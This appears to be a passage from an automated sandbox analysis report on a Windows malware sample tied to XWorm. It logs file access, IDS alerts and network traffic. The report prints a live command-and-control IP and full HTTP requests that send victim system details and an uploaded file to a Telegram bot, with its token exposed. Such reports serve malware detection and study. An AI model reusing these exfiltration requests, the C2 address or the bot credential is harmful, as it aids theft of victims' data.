Source:	Binary string: n.pdb source: powershell.exe, 00000033.00000002.2006716977.000001F23D140000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: sB2ClgrGng.exe, 00000000.00000003.1756191157.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000002.2201961884.00007FFE148D3000.00000002.00000001.01000000.00000005.sdmp, VCRUNTIME140.dll.0.dr
Source:	Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG" source: sB2ClgrGng.exe, 00000001.00000002.2195488929.00007FFDFAD49000.00000040.00000001.01000000.0000000F.sdmp
Source:	Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: sB2ClgrGng.exe, 00000000.00000003.1756191157.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000002.2201961884.00007FFE148D3000.00000002.00000001.01000000.00000005.sdmp, VCRUNTIME140.dll.0.dr
Source:	Binary string: D:\a\1\b\bin\amd64\sqlite3.pdb source: sB2ClgrGng.exe, sB2ClgrGng.exe, 00000001.00000002.2196754681.00007FFDFAED1000.00000040.00000001.01000000.0000000B.sdmp
Source:	Binary string: D:\a\1\b\libcrypto-3.pdb source: sB2ClgrGng.exe, sB2ClgrGng.exe, 00000001.00000002.2195488929.00007FFDFADE1000.00000040.00000001.01000000.0000000F.sdmp
Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\tuy1nspn\tuy1nspn.pdb source: powershell.exe, 00000033.00000002.1942613111.000001F225215000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: D:\Projects\WinRAR\rar\build\rar64\Release\RAR.pdb source: rar.exe, 00000054.00000002.2056884816.00007FF71F100000.00000002.00000001.01000000.00000024.sdmp, rar.exe, 00000054.00000000.2033915659.00007FF71F100000.00000002.00000001.01000000.00000024.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\select.pdb source: sB2ClgrGng.exe, 00000001.00000002.2201662595.00007FFE148B1000.00000040.00000001.01000000.0000000D.sdmp
Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\tuy1nspn\tuy1nspn.pdbhP source: powershell.exe, 00000033.00000002.1942613111.000001F225215000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: sB2ClgrGng.exe, 00000001.00000002.2200043623.00007FFE11EC1000.00000040.00000001.01000000.00000006.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: sB2ClgrGng.exe, 00000001.00000002.2200583861.00007FFE13201000.00000040.00000001.01000000.00000011.sdmp
Source:	Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WA source: sB2ClgrGng.exe
Source:	Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: sB2ClgrGng.exe, 00000001.00000002.2199693480.00007FFE0EC5C000.00000040.00000001.01000000.00000008.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: sB2ClgrGng.exe, 00000001.00000002.2200350794.00007FFE130C1000.00000040.00000001.01000000.00000012.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: sB2ClgrGng.exe, 00000001.00000002.2199693480.00007FFE0EC5C000.00000040.00000001.01000000.00000008.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: sB2ClgrGng.exe, 00000001.00000002.2201280162.00007FFE1463E000.00000040.00000001.01000000.00000009.sdmp
Source:	Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG"OpenSSL 3.0.13 30 Jan 20243.0.13built on: Mon Feb 5 17:39:09 2024 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-3"MODULESDIR: "C:\Program Files\OpenSSL\lib\ossl-modules"CPUINFO: N/Anot availableget_and_lock..\s\crypto\ex_data.cossl_crypto_get_ex_new_index_exossl_crypto_new_ex_data_exCRYPTO_dup_ex_dataCRYPTO_set_ex_dataOPENSSL_WIN32_UTF8..\s\crypto\getenv.ccompiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG";CPUINFO: OPENSSL_ia32cap=0x%llx:0x%llxOPENSSL_ia32cap env:%sos-specificC:\Program Files\Common Files\SSLC:\Program Files\OpenSSL\lib\ossl-modules.dllCPUINFO: ..\s\crypto\init.cOPENSSL_init_cryptoOPENSSL_atexit..\s\crypto\initthread.c..\s\crypto\mem_sec.cassertion failed: (bit & 1) == 0assertion failed: list >= 0 && list < sh.freelist_sizeassertion failed: ((ptr - sh.arena) & ((sh.arena_size >> list) - 1)) == 0assertion failed: bit > 0 && bit < sh.bittable_sizeassertion failed: TESTBIT(table, bit)assertion failed: !TESTBIT(table, bit)assertion failed: WITHIN_FREELIST(list)assertion failed: WITHIN_ARENA(ptr)assertion failed: temp->next == NULL \|\| WITHIN_ARENA(temp->next)assertion failed: (char *)temp->next->p_next == listassertion failed: WITHIN_FREELIST(temp2->p_next) \|\| WITHIN_ARENA(temp2->p_next)assertion failed: size > 0assertion failed: (size & (size - 1)) == 0assertion failed: (minsize & (minsize - 1)) == 0assertion failed: sh.freelist != NULLassertion failed: sh.bittable != NULLassertion failed: sh.bitmalloc != NULLassertion failed: !sh_testbit(temp, slist, sh.bitmalloc)assertion failed: temp != sh.freelist[slist]assertion failed: sh.freelist[slist] == tempassertion failed: temp-(sh.arena_size >> slist) == sh_find_my_buddy(temp, slist)assertion failed: sh_testbit(chunk, list, sh.bittable)assertion failed: WITHIN_ARENA(chunk)assertion failed: sh_testbit(ptr, list, sh.bittable)assertion failed: ptr == sh_find_my_buddy(buddy, list)assertion failed: ptr != NULLassertion failed: !sh_testbit(ptr, list, sh.bitmalloc)assertion failed: sh.freelist[list] == ptr/0123456789ABCDEFCRYPTO_memdup..\s\crypto\o_str.chexstr2buf_sepossl_hexstr2buf_sepbuf2hexstr_sepossl_buf2hexstr_sep..\s\crypto\packet.cwpacket_intern_init_lenWPACKET_start_sub_packet_len__..\s\crypto\param_build.cparam_pushparam_push_numOSSL_PARAM_BLD_push_BN_padNegative big numbers are unsupported for OSSL_PARAMOSSL_PARAM_BLD_push_utf8_stringOSSL_PARAM_BLD_push_utf8_ptrOSSL_PARAM_BLD_push_octet_stringOSSL_PARAM_BLD_
Source:	Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: sB2ClgrGng.exe, 00000001.00000002.2200882637.00007FFE13381000.00000040.00000001.01000000.0000000C.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_sqlite3.pdb source: sB2ClgrGng.exe, 00000001.00000002.2199391606.00007FFE0EC11000.00000040.00000001.01000000.0000000A.sdmp
Source:	Binary string: D:\a\1\b\libssl-3.pdb source: sB2ClgrGng.exe, sB2ClgrGng.exe, 00000001.00000002.2198558047.00007FFDFF214000.00000040.00000001.01000000.00000010.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: sB2ClgrGng.exe, sB2ClgrGng.exe, 00000001.00000002.2199060511.00007FFE0EBD1000.00000040.00000001.01000000.0000000E.sdmp

Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Code function: 0_2_00007FF644879280 FindFirstFileExW,FindClose,	0_2_00007FF644879280
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Code function: 0_2_00007FF6448783C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	0_2_00007FF6448783C0
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Code function: 0_2_00007FF644891874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,	0_2_00007FF644891874
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Code function: 1_2_00007FF644879280 FindFirstFileExW,FindClose,	1_2_00007FF644879280
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Code function: 1_2_00007FF644891874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,	1_2_00007FF644891874
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Code function: 1_2_00007FF6448783C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	1_2_00007FF6448783C0
Source: C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exe	Code function: 84_2_00007FF71F0B46EC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	84_2_00007FF71F0B46EC
Source: C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exe	Code function: 84_2_00007FF71F0F88E0 FindFirstFileExA,	84_2_00007FF71F0F88E0
Source: C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exe	Code function: 84_2_00007FF71F0AE21C FindFirstFileW,FindClose,CreateFileW,DeviceIoControl,CloseHandle,	84_2_00007FF71F0AE21C

Source: C:\Users\user\Desktop\sB2ClgrGng.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\js\	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Cache\	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\	Jump to behavior

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 198.23.219.104:7000 -> 192.168.2.4:49739
Source: Network traffic	Suricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.4:49739 -> 198.23.219.104:7000
Source: Network traffic	Suricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.4:49739 -> 198.23.219.104:7000
Source: Network traffic	Suricata IDS: 2852874 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 : 198.23.219.104:7000 -> 192.168.2.4:49739
Source: Network traffic	Suricata IDS: 2853193 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.4:49739 -> 198.23.219.104:7000
Source: Network traffic	Suricata IDS: 2853931 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PCShutdown Inbound : 198.23.219.104:7000 -> 192.168.2.4:49739
Source: Network traffic	Suricata IDS: 2853954 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PCShutdown Inbound : 198.23.219.104:7000 -> 192.168.2.4:49739

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: 198.23.219.104

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Yara detected Generic Downloader

Source: Yara match	File source: 15.0.bound.exe.2f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Users\user\AppData\Roaming\word.exe, type: DROPPED

Source: global traffic

TCP traffic: 192.168.2.4:49739 -> 198.23.219.104:7000

Source: global traffic

HTTP traffic detected: GET /bot7151126433:AAGnFv8HooRtSQ_cEeb4ANUyyyQ1LbT0Ehc/sendMessage?chat_id=-1002219810475&text=%E2%98%A0%20%5BFluxJacker%20@mrfluxdev%5D%0D%0A%0D%0ANew%20CLient%20:%20%0D%0A75AB9E535C7E64F8DEDE%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%209FGY78%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroup%20:%20RK%20New%20Staup HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive

Source: unknown

DNS query: name: ip-api.com

Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.219.104
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.219.104
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.219.104
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.219.104
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.219.104
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.219.104
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.219.104
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.219.104
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.219.104
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.219.104
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.219.104
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.219.104
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.219.104
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.219.104
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.219.104
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.219.104
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.219.104
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.219.104
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.219.104
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.219.104
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.219.104
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.219.104
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.219.104
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.219.104
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.219.104
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.219.104
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.219.104
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.219.104
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.219.104
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.219.104
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.219.104
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.219.104
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.219.104
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.219.104
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.219.104
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.219.104
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.219.104
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.219.104
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.219.104
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.219.104
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.219.104
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.219.104
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.219.104
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.219.104
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.219.104
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.219.104
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.219.104
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.219.104
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.219.104
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.219.104

Source: global traffic	HTTP traffic detected: GET /bot7151126433:AAGnFv8HooRtSQ_cEeb4ANUyyyQ1LbT0Ehc/sendMessage?chat_id=-1002219810475&text=%E2%98%A0%20%5BFluxJacker%20@mrfluxdev%5D%0D%0A%0D%0ANew%20CLient%20:%20%0D%0A75AB9E535C7E64F8DEDE%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%209FGY78%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroup%20:%20RK%20New%20Staup HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /json/?fields=225545 HTTP/1.1Host: ip-api.comAccept-Encoding: identityUser-Agent: python-urllib3/2.2.2

Source: sB2ClgrGng.exe, 00000001.00000002.2192067686.00000281AC4A8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: `https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: sB2ClgrGng.exe, 00000001.00000002.2192067686.00000281AC4A8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: `https://www.youtube.com/ equals www.youtube.com (Youtube)

Source: global traffic	DNS traffic detected: DNS query: api.telegram.org
Source: global traffic	DNS traffic detected: DNS query: ip-api.com

Source: unknown

HTTP traffic detected: POST /bot7151126433:AAGnFv8HooRtSQ_cEeb4ANUyyyQ1LbT0Ehc/sendDocument HTTP/1.1Host: api.telegram.orgAccept-Encoding: identityContent-Length: 718866User-Agent: python-urllib3/2.2.2Content-Type: multipart/form-data; boundary=eb9cccf662e2649c85fa5e8d1397dd63

Source: sB2ClgrGng.exe, 00000000.00000003.1759226545.000001D37210F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digi
Source: sB2ClgrGng.exe, 00000000.00000003.1761398550.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757410197.000001D37211C000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000002.2205989359.000001D37211C000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1759226545.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1761713787.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1756739377.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757512857.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1759647599.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1761196357.000001D37211C000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1759357269.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757759866.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757410197.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757281779.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1761196357.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1756883286.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757187950.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1758733338.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757004172.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757639534.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: sB2ClgrGng.exe, 00000000.00000003.1761398550.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1759226545.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1761713787.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1756739377.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757512857.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1759647599.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1759357269.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757759866.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757410197.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757281779.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1761196357.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1756883286.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757187950.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1758733338.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757004172.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757639534.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.dr, _socket.pyd.0.dr, _ssl.pyd.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: sB2ClgrGng.exe, 00000000.00000003.1761398550.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1759226545.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1761713787.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1756739377.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757512857.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1759647599.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1759357269.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757759866.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757410197.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757281779.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1761196357.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1756883286.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757187950.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1758733338.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757004172.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757639534.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.dr, _socket.pyd.0.dr, _ssl.pyd.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: sB2ClgrGng.exe, 00000000.00000003.1761398550.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757410197.000001D37211C000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000002.2205989359.000001D37211C000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1759226545.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1761713787.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1756739377.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757512857.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1759647599.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1761196357.000001D37211C000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1759357269.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757759866.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757410197.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757281779.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1761196357.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1756883286.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757187950.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1758733338.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757004172.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757639534.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: sB2ClgrGng.exe, 00000001.00000003.1898231432.00000281AC04F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1833375883.00000281AC04F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1878461049.00000281AC04F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1920331178.00000281AC04F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1872240712.00000281AC04F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1823342722.00000281AC04F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1893801082.00000281AC04F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comod
Source: sB2ClgrGng.exe, 00000000.00000003.1760688256.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000002.2205989359.000001D3720F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
